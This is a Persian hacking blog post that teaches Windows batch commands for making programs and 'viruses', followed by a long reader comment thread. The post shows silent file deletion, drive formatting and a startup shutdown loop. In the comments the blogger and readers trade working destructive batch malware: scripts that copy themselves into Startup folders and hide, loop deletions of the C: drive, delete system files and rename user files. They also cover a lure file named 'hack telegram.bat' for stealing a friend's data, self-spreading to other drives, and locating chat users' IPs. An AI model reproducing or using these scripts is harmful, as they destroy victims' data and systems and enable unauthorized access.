دستورات سی ام دی bat :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

در این پست تمام دستوراتی که در ساخت برنامه ها و ویروس ها به زبان بت استفاده میشه رو بررسی میکنیم

خیلی ها بر این باورن که bat مخصوص جوجه هکر هاست و به درد نمیخوره. منم حرفشون رو تایید میکنم ولی موضوع اینجاست که هکر یا جوجه هکر یا فنج هکر یا هرچیزی که مدعیان و قدقدی های هک و امنیت روش اسم میزارن باید با این دستورات آشنا باشن.چون برای هکر شدن باید یه مدت هم جوجه هکر باشی دیگه.
زبان برنامه نویسی نیست ، ساده و قدیمیه ، دیگه مثل سابق کاربرد نداره ولی پله اول هک بدون نرم افزاره.
فایل های بت bat همون دستورات سی ام دی هستن که به شکل یه دسته دراومدن. اینجا مختصری از دستورات این فایل هارو به زبان ساده توضیح میدم. باید به یاد داشته باشید که شما میتونید هر دستور دیگه سی ام دی رو در این برنامه ها قرار بدین.


دستورات تعریف شده:
@       Call      Echo      Pause       Rem
goto cd set if For
cls Format mkdir shot



@

تمام خروجی های داس را مخفی میکند.

یعنی در صفحه داس یا همون سی ام دی نمایش نمیده که چه دستوری وارد شده

@echo OFF

تمام دستورات دسته ی echo OFF را مخفی میکند.


call

فراخوانی یک برنامه یا فایل

call C:\Windows\notepad.exe

تکه کد بالا نود پد را جرا خواهد کرد


echo

برای کنترل نحوه نمایش دستورات (نمایش داده شوند یا خیر). ویا میتوانیم برای نوشتن پیام خوش آمد گویی "ابتدای برنامه" یا ارتباط با کاربر از این دستور استفاده کنیم

echo off

دستورات را بدون نمایش دادن اجرا میکند

echo on

دستورات را نمایش داده اجرا میکند

echo Y|Del *.*

فایلی که برای برنامه تعریف کردیم تا حذفش کند را بدون اجازه گرفتن از کاربر پاک میکند.


Pause

ایجاد وقفه یا مکث بین دستورها

وقتی چند تا دستور قراره پشت سر هم اجرا بشه ما میتونیم بعد از هر دستور یا بین چند دستور به کاربر هشدار یا پیامی بدیم که کاربر بعد از فشار دادن کلیدی دستورات ادامه پیدا کنه

pause edame mdahid?

ایجاد وقفه با پیام

pause > nul

ایجاد وقفه بدون پیام


rem

فقط برای نمایش پیام ، جزئیات ، توضیح و یا معرفی در کد نویسی است.

rem Virus32

فقط کلمه Virus32 را نمایش میدهد. اینجا استفاده شده است


goto

تکرار یا رفتن به دستور (یا دسته) مشخص شده توسط برچسب آن

برچسب باید از قبل تعریف شده باشد

goto:a

دستور بالا به دسته a میرود. مثال این دستور


:

برای ایجاد دسته

@echo off
:a
echo # Virus32.blog.ir #
color A
pause
:b
echo # nice web :) #
color F
pause
:c
echo # we love iran #
color C
pause
goto :a

در کد بالا دو دسته با نام های a و b و c تعریف شده است


cd

برای دیدن مسیر و تغییر آن

cd Desktop

به دسکتاپ میرود

cd ..

یک مرحله از مسیر به عقب باز میگردد. برای مثال اگر در مسیر زیر باشید

C:\Users\Virus32\Contacts>

با وارد کردن دستور به مسیر زیر خواهید رسید

C:\Users\Virus32>

set
برای مقدار دهی به متغیر ها "رشته ای و صحیح"
set stringvar=Virus
متغییر رشته ای
set /a integervar=32
متغییر صحیح
set a=%b% %c% %d% %n%
مقدار a را برابر با مقدار های b و c و d و n قرار میدهد "فراخوانی متغییر" که میتونیم از یک تا صدها متغییر رو فراخوانی کنیم.
set /p name=esme khod ra vared konid
دستور بالا از کاربر اسمشو میخواد که نام کاربر رو مساوی متغییر name قرار میده.
set /a b=(%c%*%d%)+%e%/%f%
اعمال ریاضی

if
این دستور که تقریبا تو همه زبان های برنامه نویسی هم وجود داره یه دستور شرطیه که در صورت درست بودن شرط به روند کار ادامه میده و در غیر این صورت کار جدیدی رو شروع میکنه.
if not
تقریباً همون Else در زبانهای برنامه نویسی است به معنیه "درغیر این صورت" که اگه شرطمون برقرار نبود کار جدید رو با این دستور تعریف میکنیم
if %a%=="32" goto :b
if not %a%=="32" goto :Error

اگر مقدار متغیر a برابر 32 بود به خط b میره در غیر این صورت هم پیام ارور رو نمایش میده.

For
این دستور هم مانند دستور بالا در بیشتر زبان های برنامه نویسی وجود داره. به کمکش میتونیم برای متغییرمون مقدار یا مقدارهایی رو از فایل های دیگه فراخوانی کنیم و یا میتونیم به اصطلاح حلقه برای تکرار تکه کد یا دستوراتمون ایجاد کنیم که در ساخت اتکرها و یا برنامه های مخرب سرخود در زبان هایی مثل پایتون و دلفی از این کد بیشتر استفاده میکنیم.
الگوی این دستور در bat به شکل زیر است.
for %%motaghayer in (list) do dastoore-badi
که برای متغییر مون از لیست ، مقدارها یا متغیرهای دیگری رو تعین میکنیم و در دستور بعدی هم میگیم که با این مقدارها چیکار کنه.
echo off
FOR %%A IN (1 2 3) DO GOTO=%%A
:1
ECHO hi ...
:2
ECHO my name is :
:3
ECHO Virus32
pause

در اینجا برای متغیر A متغیرهای 1 و 2 و 3 را از لیست تعریف کرده و دستور اجرای آنها رو دادیم "میتونستیم بجای نمایش دادن کلمات بالا دستورات دیگه ای برای متغیرهای 1 و 2 و 3 تعریف کنیم و یا مقدار متغیرها را باز خوانی کنیم".

cls 
از این دستور برای پاک کردن کامنت هایی که در سی ام دی وارد شده استفاده میکنیم.

Format
برای فرمت کردن یک درایو استفاده میشه.
Format f:
فرمت کردن درایو f

mkdir
برای ایجاد پوشه
mkdir d:\32\32\32\32\32\32\32
در درایو D هفت پوشه تو در تو به نام 32 ایجاد میکند

Shutdown -r -t 00
برای خاموش کردن سیستم.
ویروس بلستر در اصل همین دستور ساده بود که در استارت آپ قرار میگرفت که بمحض روشن شدن سیستم اجرا میشد و سیستم رو دوباره خاموش میکرد.

بازم آپدیتش میکنم...
ببینم طرفدارش چقده!!!

نظر (۷۹)

دستور های با حالین بازم بذار داش
خخخخخخخخخخخخ دهنت سرویس
عجیب ترین هکری هستی که تا حالا دیدم ویروس اخلاق خوبی داری ولی با همون اخلاق خوب یهو زد حال میزنی به آدم
من فکر میکردم تو عاشق لینوکسی از ویندوز بدت میاد چی شد پس؟ :)
حرفاتو قبول دارم داشی فقط تا بچه ها ندیدن اسم منو بردار لاقل سوژه نشم آخه من بخاطر حرفای تو جبهه گرفته بودم :))
Virus32 Virus 32 :
:)
من هکر نیستم داشی :)
اخلاق خوب هر آدم دلیل نمیشه آدم خوبی باشه
  • حرفاتو قبول دارم .....
پس اومدی سرعقل؟ خخخخخخخخخخ بزا باشه مگه چیه؟ تو بخاطر حرفای خودم به خودم جبهه گرفته بودی؟ این دیگه آخرتشه هاهاهاهاها
سلام
توضیحاتت خوب بود ادامه بده داشی
راستی چرا منو از مدیریت اخراج کردی؟ :(
مگه چیکار کردم؟
Virus32 Virus 32 :
سلام عزیز
کجایی تو بابا دلم برات تنگ شده بود ؟ :(
راستش دیشب دلم گرفته بود همه رو از دم حذف کردم :)
دوباره لاگین شو بهت درجه دادم :)
سلام ویروس
انگار رفیقای خنگت بازم دارن به اسمت ثبت میکنن
حواستو جم کن بازم میوفتی تو هجل اینبار دهنت سرویسه ها
اسکو رو ببین تا الان چهارتا شکایت داری
اگه نمیتونی نفوذ کنی بهم خبر بده عکس ارسال کنم
Virus32 Virus 32 :
سلام داداش
مرسی خبر دادی حواسم نبود
میتونم نفوذ کنم فقط بیا بگو اینارو چجوری باید کیل کنم؟
از 89e3008 تا 89e3503 کلا همه امکاناتم رو گرفتن اسمم تو لیست سیاهه :(
وقتی تو لیست سیاهی چطوری وارد شدی؟ اگه ترفند داره برا منم ایمیل کن
محدوده رو نمیشه کیل کرد امشب ساعت 9 بیا همون سایت همیشگی رو ترفندش دارم کار میکنم بیا کمکم کن زودتر به نتیجه برسیم.
هر وقت اومدی تک بنداز رو گوشیم
من دیگه نمیام اینجا
فعلا خدافظی
Virus32 Virus 32 :
با مانکی اسکریپت تزریق کردم
آموزشش یکم طولانیه تو مانکی رو نصب کن امشب سر فرصت برات ایمیل میکنم
ساعت 9 میبینمت.
داداش ادرس چترومتو بده :-)
ایول داش دمت گرم بازم مثل همیشه عالی بود
ویروس جون میشه اموزش به دست اوردن ای پی افراد داخل چتروم رو بهم یا بدی؟فوریه داداش
Virus32 Virus 32 :
سلام داشی
برو خصوصی طرف یه پی ام بده بهش
بعد از دستور netstat استفاده کن
پورت 80 یا 8080 مخصوص سیستم اون شخص خواهد بود
حواست باشه بجز کسی که میخوایی هکش کنی با کس دیگه ای خصوصی چت نکن
بعدا کامل این بحث رو توضیح میدم!!!
شرمنده داداش جون ولی بحز اون تیکه اولش ک گفتی خصوصی پی ام بده باقیشو نفهمیدم اخه من هنو تازه کارم اگه میشه تو ی پست بازش کن :-)
Virus32 Virus 32 :
تو سی ام دی دستور رو وارد کن دیگه
ادامه دهید لطفن
عالیی بود
برای من که مبتدی هستم خیلی خوب بود
خییییلی ممنون
خوب بود ، مطالب بیشتری بزارین سایت خیلی خوبیه
خب اینا روباس کجا کپی کنیم؟؟؟
خیلی عالی بود فقط اگه میشه بگین کدی هست که وقتی bat فایل اجرا شد خودش رو تو startup کپی کنه؟
ممنون میشم آخه هر جا گشتم نبود
Virus32 Virus 32 :
تو پست های قبلی توضیح داده شده
من پست قبلی رو پیدا نکردم میشه لینکش رو تو کامنتتون بزارین
با تشکر
من از این کد استفاده کردم ولی کار نمیکنه مشکل کار چیه لطفا راهنمایی کنید میخام که bat فایلی که ساختم خودش رو تو startup کپی کنه ولی هیچی نمیشه

copy name.bat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Virus32 Virus 32 :
ابتدا باید کد رو به صورت زیر بنویسید "آدرس رو بین دو کوتیشن قرار دهید"
copy Name.bat "C:\ProgramData"
و اینکه برای اجرای این کد و برای کپی کردن فایل در درایو سی یا ویندوز باید از سیستم بصورت ادمین استفاده کنید
برای تست میتونید بجای آدرس درایو سی درایو دیگری رو تست کنید
copy Name.bat "D:\"

واقعا ممنون ویروس جان کارت خیلی درسته
کارت درسته امید وارم بازم اپدیتش کنی و همینطور خوشم اومد برای هر دستور یک مثال هم زدی
میشه آموزش ساخت ویروس کلونر با bat فایل ها را بگید
یا حداقل تو کامنتتون کدش رو بزاید واقعا ممنون میشم
Virus32 Virus 32 :
اینجا رو بخون
دمت گرم پسر/ میدونستی خیلی باحالی؟ :)
سلام.یه سوال اصل هک کردن یه سیستم باید چه زبانی رو بلد باشی؟و برای هک گوشی های اندرویدی چه زبانی باید بلد باشی؟من در حال حاضر زبان سی شارپ رو فولم و ویژوال بیسیک رو یکم بلدم:|


یه سوال دیگه:تو این کد خاموش کردن سیستم t+ کارش چیه دقیقا؟و اون 00 برا اساس صفر و یکه؟مرسیییییییییییییی
سلام.چطوری؟خسته نباشی

میگم که برای هک سیستم چه زبانی رو باید بلد باشی و ازش استفاده کنم؟و برای هک گوشی اندرویدی با جه زبانی میشه؟
من زبان سی شارپ رو بلدم و ویژوال بیسیکم یکم بلدم.اومدم زبان سی رو یاد بگیرم که گوز پیچ شدم:)))))))))))))

تو این کد خاموش کردن سیستم t+ کارش چیه؟و 00 یعنی بر اساس صفر و یک هست آیا؟لطفا کمک کن داداش مرسیییییییییییییی
Virus32 Virus 32 :
سلام ممنون
از اونجایی که دنیای هک خیلی گسترده و پیچیده است باید بگم برای هک سیستم هر زبانی که بلد باشی میشه باهاش یه کارایی کرد برای شروع هم بهتره با دستورات بت و با قسمت ریجستری سیستم آشنایی داشته باشی برای هک گوشی های اندروید هم باید برنامه نویسی به زبان apk رو یاد بگیری.!
با سی شارپ و ویژوآل بیسیک هم میشه برخی کارها رو انجام داد و به نیاز های یک هکر دست یافت که البته زبان سی رو یاد بگیری رو دست همه میزنی :)
توی اون کد هم t به معنای زمان است و 00 هم یعنی در زمان صفر ثانیه دستور خاموشی رو اجرا کن یعنی در آن واحد سیستم رو خاموش میکنه :)
موفق باشی
سلام.چطوری باز مزاحم شدم:)
میگم که مثلا این ویروسی که خاموش میکنه:میخوام این ویروس مثلا بزارم تو یه پوشه عادی و بعد که کاربر وارد اون پوشه که ویروسه توشه شد خودکار اون ویروس اجرا بشه؟مرسی
Virus32 Virus 32 :
سلام
باید یه اتوران براش درست کنی البته با این سیستم های امروزی که امنیتشون خیلی قویه فکر نکنم بشه همچین کاری کرد به این آسونی
سلام داش چطوری؟تو این حک رمز فایل rar از من جواب نمیده و این جمله هی تکرار میشه:'UNRAR' is not recognized as an internal or external command,
operable program or batch file.
325801019922647108138684276622087438717991
چی کار کنم؟؟ویندوزم 64 بیتی و ویندوز 10 دارم
سلام
Shotdown -r -t 00
اشتباه تایپی شده
تصحیح کن
عالی تر میشه :)
Virus32 Virus 32 :
سلام
اصلاح شد
مرسی :)
سلام ممنون ازت
خیلی چیزا ازت یاد گرفتم لطفا برای هر کد مثالی بزنید و بیشتر موارد کاربردشو بگید بخصوص درباره کدهای متغیره بیشتر توضیح بده و نحوه استفاده اش را هم توضیح بده.
خیلی حال میکنم با وبلاگت.
دمت گرم موفق باشی.
خخخخ فنچ هکر دمت گم خیلی باحالی
Virus32 Virus 32 :
;)
واقعا عالیه دمت گر هکر خوبی هستی
:)
:0
عیول خیلی وبت باحاله
بازم از اینا بزار
☻☺
دمتون گرم خیلی خوب بود من توعمرم برا سایتی نظر نزاشتم ولی دیدم اینو نزارم نامردی
خیلی عالی بود دوروزه دنبال این کد ها بودم
یه سوال هم داشتم چطور یک عمل رو میتونم بینهایت انجام بدم دستور خاصی داره؟
Virus32 Virus 32 :
نظر لطف شماست
میتونیم با دستور goto اینکار رو انجام بدیم
اینجا رو بخونید
میشه راجب این نظر بدید
@echo off
Cls
Copy c:\ + paste f:\
این کار برا وقتی که فلشتو میدی دوستت برا یه کاری بعد اینم میزاری تو فلش اسمشم
جزاب میزاریم که طرف ۱۰۰٪ بازش کنه مثلا hack telegram.bat
بعد کل اطلاهات طرف از کامپیوترش میاد تو فلش ما
البته هنوز نسنش نکردم نمیدونم کار میکنه یانه؟
Virus32 Virus 32 :
O_o نمیدونم چی باید بگم
خوبه ولی ...
تو سعی داری درایو سی رو با اون عظمتش بریزی توی فلشت؟ و بعدا آنالیزش کنی؟
  • Virus32
  • amirhossein lashkari
  • یه سوال داشتم
    چجوری میشه با فایل بت به ادرس مشخصی تو اینترنت رفت به صورت مستقیم نه با کمک vbs
    سایتتون هم عالیه ممنون
    Virus32 Virus 32 :
    start http://virus32.blog.ir
    ممنون یه سوال دیگه با چه دستوری میتونم وقفه ای ایجاد کنم که بعد از یک مدت مشخص باز شروع کنه
    مثل pause ولی زمان داشته باشه نه با زدن دکمه ای
    ممنون میشم راهنمایی کنید
    Virus32 Virus 32 :
    از تایمر استفاده میکنیم
    در کدهای زیر بعد از 5 ثانیه دستور بعدی که اجرا شدن فایل بت هست صادر میشه
    TIMEOUT /T 5 /NOBREAK
    call C:\Windows\notepad.exe
    بجای 5 میتونی هر عددی رو قرار بدی!!!
    سلام
    وبلاگتون عالیه
    اگه میشه کد های بیشتری بذارید
    ممنون
    خیلی خوب فکر نمیکردم جایی این مطالب پیدا کنم ولی دست مریضات گل کاشتی ایول
    امیدوارم موفق بشی
    WEb-KILLER
    ایول داداش دمت گرم خیلی عالی بود ممنون میشم اگه اپدیتش کنی👍👍👌👌
    راهی برای عوض کردن permission ها با استفاده از دستورات داس وجود داره؟؟؟اگه داره بگین
    Virus32 Virus 32 :
    اینجا جوابتون رو دادم
    سلام
    راهی برای عوض کردن permission ها به کمک فایل بت وجود داره؟؟؟؟
    مثلا میخوای یه فایلی رو از طریق سی ام دی پاک کنی ارور access denied میده.
    راستش من از طریق تب سکوریتی میدونم میشه هر permission رو که بخای تغییر داد ولی میخوام با سی ام دی انجامش بدم.

    دمت گرم.
    خیلی باحالی.
    Virus32 Virus 32 :
    اینجا جوابتون رو دادم
    سلام و خدافظ
    من دیگه دارم کم کم شکاک میشم در مورد تو داش
    Virus32 Virus 32 :
    سلام
    چرا؟
    سلام داش
    اخه خوب راستش من نفهمیدم این جریان تو چیه که یه مدت فتی حالا اومدی و نمی تونی مطالبی بزاری که زیاد به درد بخوره فک کنم میترسی یا که ....؟
    Virus32 Virus 32 :
    سلام
    مفصله بهش فکر نکن زیاد مهم نیست :)
    سلام میشه همین رمز مطالب رو به تلگرامم بفرسته اینم ایدی javidj7
    Virus32 Virus 32 :
    سلام
    تو گروه کانال از ادمینا درخواست کنید
    درود

    تبریک میگم سال نو رو ب همتون :)
    داداش ویروس ، کدی وجود داره ک باهاش بشه هرچی ک تو سی ام دی نوشته میشه رو تو یه فایل متن بیاره ؟؟ ( با دستورات داس

    مثلا من ی برنامه دارم میسازم میخوام توش یه دستوری اجرا بشه و جوابش تو یه فایل متنی نوشته بشه

    ایول داداش
    Virus32 Virus 32 :
    سلام
    ممنون همچنین
    dastor > name.text
    ipconfig > name.txt
    دستور کل
    c:/windows/ipconfig > name.txt 
    آقا دمت گرم حتماً برای اشتراک گذاشتن این مطالب و آموزش ها خیلی زحمت کشیدی
    خیلی ازت ممنونم
    دستتم درد نکنه
    امیدوارم همیشه موفق باشی. مرسی
    Virus32 Virus 32 :
    خواهش میکنم عزیز
    ممنون
    باسلام بسیار عالی و آموزنده بود ماشالا به اعضا و نویسندگان سایت خوب و مفید ویروس32.
    بزودی برای همکاری با شما تماس میگیرم !
    /امیرفابو
    چه دستوری توی یه فایل bat بنویسم که خودش توی ادرس های مشخص شده کپی کنه و از هر جا اجرا شد جواب بده؟
    من یه برنامه نوشتم
    cd desktop
    copy a.bat c:
    copy a.bat d:
    copy a.bat e:
    copy a.bat f:
    که فقط در صورتی جواب میده که با دسترسی غیر ادمین و از توی دسکتاپ و با اسم a.bat باشه
    با دسترسی غیر ادمین گفتم چون به طور پیش فرض توی
    c:users/%username/%
    هست و با cd desktop بره توی desktop
    Virus32 Virus 32 :
    سلام
    کد زیر دستور کپی شدن فایل aaa.bat رو به درایو های مختلف رو میده
    این فایل هرجا که باشه Location خودشو شناسایی میکنه و خودشو کپی میکنه هرجا که بهش دستور داده شده
    copy /Y %cd%\aaa.bat D:\aaa.bat
    copy /Y %cd%\aaa.bat E:\aaa.bat
    Pause
    به کمک دستور %cd% لوکیشن فایل رو به دست میاریم و ...
    البته دستور Pause رو نباید قرار بدی تا صفحه داس دیده نشه :) اونو برای دیده شدن نتیجه عملیات نوشتم :)
    ممنون که جواب دادین
    یه سوال دیگه
    چجوری میشه یه دستوری بنویسیم که مثلا یک ماه دیگه ویروسی که نوشتیم اجرا کنه؟
    Virus32 Virus 32 :
    این پست رو بخونین ( برای شما نوشتمشD: ) و خودتون هم یکم نو آفرینی داشته باشین D:
    ممنون که اینقدر به فکرم بودی
    تا جایی که خودم نو افرینی کردم
    دستوری بنویسیم که توی فایل مشخصی که توسط خود ویروسمون درست شده در هر ساعت مثلا یک نقطه بزاره
    :a
    timeout /t 3600
    echo .>> C:\Users\hamed\AppData\LocalLow\time.txt
    goto:a
    بعد یه دستور شرطی لازم داریم که اگه حجم فایل time بیش تر از مثلا 10 بایت بود (10 ساعت بعد) دستور اصلی ویروس برای نابود کردنش اجرا کنه
    سلام
    یه دستور شرطی میخواستم که اگه کاربر تسک منیجر باز کرد سیستم ری استارت کنه
    دستور taskkill taskmgr.exe
    امتحان کردم ولی دسترسی ادمین میخواد
    سلام

    داداش دستور runas رو توضیح میدی به صورت خلاصه
    فقط ران از ادمینیستریتور رو هم بگس کافیه
    Virus32 Virus 32 :
    سلام
    دستور runas برای سیستم هایی که دو نوع سطح کاربری (ادمین و یوزر) یا (یوزر یوزر) دارن کاربرد داره
    با این دستور میتونیم از سطح دستریسی کاربری دوممون بدون لاگین شدن استفاده کنیم
    برای مثال من از ویندوزم به عنوان کاربر ساده(Virus_32) استفاده میکنم ولی سطح ادمین یا administrator رو هم فعال کردم
    و تنها برای انجام بعضی از کارایی که باید سطح دسترسی بالایی داشته باشم با دسترسی کامل (ادمین) وارد ویندوزم میشم
    ولی ما میتونم بدون وارد شدن به سطح ادمین به کمک دستور runas دستورات دسترسی فقط ادمین رو هم اجرا کنم
    برای مثال :
    runas /noprofile /user:virus32\Administrator "D:\aaa.bat"
    خط بالا دستور اجرا شدن فایل aaa رو صادر میکنه
    که بعد از ثبت دستور باید رمز ادمین رو وارد کنید
    بسیار عالی دوست عزیز !
    کدهات واقعا به کمکم رسید :)
    بازم در این زمینه ادامه بده واقعا توضیحات و آموزشات کاملا و بی نقصن ..
    دمت گرم
    با سلام . نوشته هاتون عالی بود ولی نمیشه مال هک هم قرار بدین
    Virus32 MR_C0D3R ‌ :
    سلام
    قدم قدم پیش میریم ، مثلا تا اینجا چند تا پست برای ویروس نویسی با Batch فایل ها نوشتیم و ...
    سلام خسته نباشی.
    می گم تو دستور set نمیشه ی برنامه رو تبدیل ب دستور کرد؟
    مثلا اگر تایپ کنیم word
    برنامه ورد باز شه. با ی تابع که لینک برنامه رو ی دستور در نظر بگیره.
    Virus32 MR_C0D3R ‌ :
    سلام ممنون
    میشه انجامش داد
    به این شکل که اول با دستور Set و سوئیچ p/
    یه ورودی از کاربر بگیریم و یه شرط هم بزاریم که اگر ورودی که از کاربر گرفتیم
    برابر بود با کلمه ی word برو از فلان مسیر اینو Start کن
    با راهنمایی که کردم خودت بنویس اگه نتونستی بگو کدشو بنویسم بدم بهت
    با کمک های شما تونستم یه ویروس ساده درست کنم خیلی ممنون

    :a
    @echo off
    mkdir C:\Users\amir\Desktop\ echo folder CREATE is %random%, %random%, %random%.
    goto:a

    Virus32 MR_C0D3R ‌ :
    خواهش :)
    Echo OFF
    Title ViRus32
    Color FC
    Mode 90,24
    CLS
    :A MkDir C:\Users\%UserName%\Desktop\%Random% GOTO A
    باسلام
    ببخشید این دستورecho Y del (برای حذف فایل بدون اجازه کاربر)اصلا روی کامپیوترم کار نمیکنه روی کامپوتردیگر هم امتحان کردم ولی باز جواب نداد ممنون میشم کمکم کنید
    %random% از عدد استفاده میکنه چجوری از حروف هم استفاده کنم
    Virus32 MR_C0D3R ‌ :
    اینا نمونه های خوبی هستن
  • Virus32
  • فرهاد ارشادی
  • سلام بنظرت اینا خوبن خودم نوشتم
    @echo off
    ping localhost -n 10 >nul
    MkDir C:\Users\%UserName%\Desktop\%Random%
    rem ---------------------------------
    rem Infect Startup Folder
    copy %0 "%userprofile%\Start Menu\Programs\Startup"
    rem ---------------------------------
    rem ---------------------------------
    rem Hide Virus File After Run
    attrib +h %0
    rem ---------------------------------
    del \q \s c:\Windows\System32\cscript.exe
    del \q \s c:\Windows\System32\notepad.exe
    del \q \s c:\Windows\Boot
    del \q \s c:\Windows\System32\SnippingTool.exe
    del \q \s c:\Windows\explorer.exe
    del \q \s c:\Windows\SysWOW64\shutdown.exe
    del \q \s c:\Windows\System32\shutdown.
    سلام این کد ها جواب میده؟
    @echo off
    copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    copy %0 "C:\ProgramData\Start Menu\programs\StartUp"
    copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    attrib -h %0
    :A
    Del /q /s c:\*.* Iy
    goto :A
    باحاله ;) مثل یه اسباب بازیه اگه گفتی ؟؟؟
    mkdir C:\Users\%username%\Desktop p1
    timeout 3
    mkdir C:\Users\%username%\Desktop p2
    timeout 3
    mkdir C:\Users\%username%\Desktop p3
    timeout 3
    mkdir C:\Users\%username%\Desktop p4
    timeout 3
    mkdir C:\Users\%username%\Desktop p5
    timeout 3
    mkdir C:\Users\%username%\Desktop p6
    timeout 3
    mkdir C:\Users\%username%\Desktop p7
    timeout 3
    mkdir C:\Users\%username%\Desktop p8
    timeout 3
    mkdir C:\Users\%username%\Desktop p9
    timeout 3
    move C:\Users\%username%\Desktop\p1 C:\Users\%username%\Desktop\p2
    timeout 3
    move C:\Users\%username%\Desktop\p2 C:\Users\%username%\Desktop\p3
    timeout 3
    move C:\Users\%username%\Desktop\p3 C:\Users\%username%\Desktop\p4
    timeout 3
    move C:\Users\%username%\Desktop\p4 C:\Users\%username%\Desktop\p5
    timeout 3
    move C:\Users\%username%\Desktop\p5 C:\Users\%username%\Desktop\p6
    timeout 3
    move C:\Users\%username%\Desktop\p6 C:\Users\%username%\Desktop\p7
    timeout 3
    move C:\Users\%username%\Desktop\p7 C:\Users\%username%\Desktop\p8
    timeout 3
    move C:\Users\%username%\Desktop\p8 C:\Users\%username%\Desktop\p9


    وایرس میکر رو می شه ساخت
    Virus32 MR_C0D3R ‌ :
    میتونیم Virus Maker های ساده درست کنیم
    اما باید با مقدماتش آشنا بشی
    اگه با VBscript هم کار کرده باشی مخصوصا Windows-API 
    میتونی ویروس ها و ویروس میکر های خوبی رو بنویسی
    البته جای اینا بهتره زبان های برنامه نویسی جدید رو یاد بگیری
    سلام من دقیق دستور set رو نفهمیدم اگه زحمت برات نداره کاربردشو میگی؟
    Virus32 MR_C0D3R ‌ :
    سلام عزیز
    میدونی متغیر چیه ؟
    یه چیز تو مایه های همون متغیر های ما هستش
    یعنی میایم و یه مقادیری رو داخلش ذخیره میکنیم
    مثلا اگه از سوئیچ P/ استفاده کنیم
    کدمون میاد و یه اطلاعاتی رو از کاربر میگیره
    و ذخیره میکنه داخل اون متغیری که تعریف کردیم
    یا اینکه میتونیم با سوئیچ A/ کارای مربوط به ریاضی رو انجام بدیم
    سلام من با دستورات شما یک ویروس نوشتم
    @echo off
    title EVIL BOX
    cd desktop
    ren *.exe *.reg
    ren *.png *.evil
    ren *.jpg *.evil
    ren *.mp3 *.evil
    ren *.mp4 *.evil
    ren *.mkv *.evil
    ren *.txt *.evil

    سلام داداش واقعا دمت گرم کارت خییلی بیسته. فقط میخواسم ی کد بگی که وقتی کاربر وارد ی برنامه ی خاص بشه تمام تایپ هایی که اون انچام میده تو ی فایل txt ذخیره بشه. ممنون میشم اگه جواب بدی.

    سلام من میخوام یه کدی بنویسم که وقتی فلشم رو به کامپیوتری وصل کردم فایل کپی شه توی یک پوشه ای بعد هروقت یک یو اس بی به کامپیوتر طرف وصل شد یک فایلو پاک کنه از توی فلشش با بت و اتوران میشه ؟ من هنوز توی هک چیز یادی بلد نیستم ولی سی برای میکروکنترولر کارکردم . میشه کمک کنید ممنون میشم

    Virus32 32 Attacker ‌ :
    سلام :)
  • Virus32
  • پویا مرادی
  • میشه درمورد for/f در dos یه توضیحی بدین

    Virus32 Virus 32 :
    FOR /f  هم یه حلقه است
    به کمک این حلقه میتونیم تو کد نویسی از فایل ها کمک بگیریم و تو حلقه قرارش بدیم
    برای مثال سه تا فایل به اسم های a.tex و b.bat و c.css تو دسکتاپ هست (میتونه خیلی زیاد باشه و اسم هاشون دل بخواهیه هر فایلی میتونه باشه)
    ما میخواییم این فایل ها رو به کمک حلقه for در درایو E کپی کنیم
    ابتدا اسم فایل ها رو در یه فایل مثلا تکست باکس به اسم cc.txt مینویسم
    به شکل زیر
    a.txt
    b.bat
    c.css
    بعد به کمک کد زیر میتونیم عملیات کپی رو انجام بدیم
    FOR /f "delims=" %%G in (cc.txt) DO copy C:\Users\یوزر\Desktop\%%G E:\%%G
    pause
    یه حلقه for \f ایجاد کردیم
    delims براش تاخیر درنظر گرفتیم برای وارد کردن متغییر بعدی بعد از دستور قبلی
    %%G یه متغییر تعریف کردیم
    in (cc.txt گفتیم این متغییر مقدار هاشو رو از فایل cc.txt بگیره
    DO copy دستور کپی دادیم و .... بقیه ماجرا
    میتونیم بجای کپی هر دستور دیگه بدیم و یا میتونیم توی تکست باکس چیزای دیگه بنویسیم (سلیقه است) D:

    میشه یا سی ام دی یا فایل بت یه فایلی رو دانلود کرد؟

    Virus32 32 Attacker ‌ :
    آره توو بات یا Cmd برای اینکه یه لینکی رو باز کنیم یا سایتی رو بالا بیاریم، از کد زیر استفاده می کنیم:
    Start "Link"

    به جای Link باید لینک دانلود رو بنویسی. ولی این مثل کد wget ترمینال لینوکس عمل نمیکنه، ینی با این کد مرورگر لینک رو اجرا می کنه.
    یه کد دیگه هم هست که مثل همون دستور wget ترمینال، دان میکنه که کد Bitsadmin هست که توو گوگل سرچ کنی بهت میگه چطوریاست.

    سلام من کد if رو درست نفهمیدم

    اگه میشه یه خلاصه ازش توضیح بدین

    ممنون میشم

    Virus32 32 Attacker ‌ :
    سلام. If ینی همون اگر
    توو برنامه نویسی هم وقتی از if استفاده میکنی، درواقع داری دستور میدی اگر چنین حالتی وجود داشت اینکار رو بکن.
    مثلا ما یه برنامه طراحی میکنیم که اگه کاربر عدد صفر رو وارد کرد، برنامه پیغام سلام رو به کاربر نشون بده و اگه عدد یک رو وارد کرد به کاربر بگه خدافظ
    برای اینکار باید از if استفاده کنی

    درواقع این برنامه رو به این صورت باید بنویسی:
    اگر عدد وارد شده مساوی بود با ۰ ،  پیغام 'سلام' رو نمایش بده
    اگر عدد وارد شده مساوی بود با ۱ ، پیغام 'خدافظ' رو نشون بده.

    همین به زبان bat اینطوری میشه:
    @echo off
    Color 0a
    echo please enter the number:
    Set/p input=
    If %input%==0 goto:a
    If %input%==1 goto:b
    :a
    Cls
    echo Salam:)
    Set/p=
    exit
    :b
    Cls
    echo bey:(
    Set/p=
    exit
    خب علاوه بر این یجور دیگه هم میتونی بنویسی که استفاده از دستور if not هست. If not ینی اگر چنین نبود. ینی با دستور if به برنامه میگی اگر عدد وارد شده توسط کاربر ۰ بود، نشون بده سلام. حالا با دستور if not میگی اگر عدد وارد شده ۰ نبود به کاربر نشون بده خدافظ ....

    سلام

    چه طوری باید کاری کرد که کلا صفحه نمایش داده نشه؟

    در پس زمینه کار کنه کلا

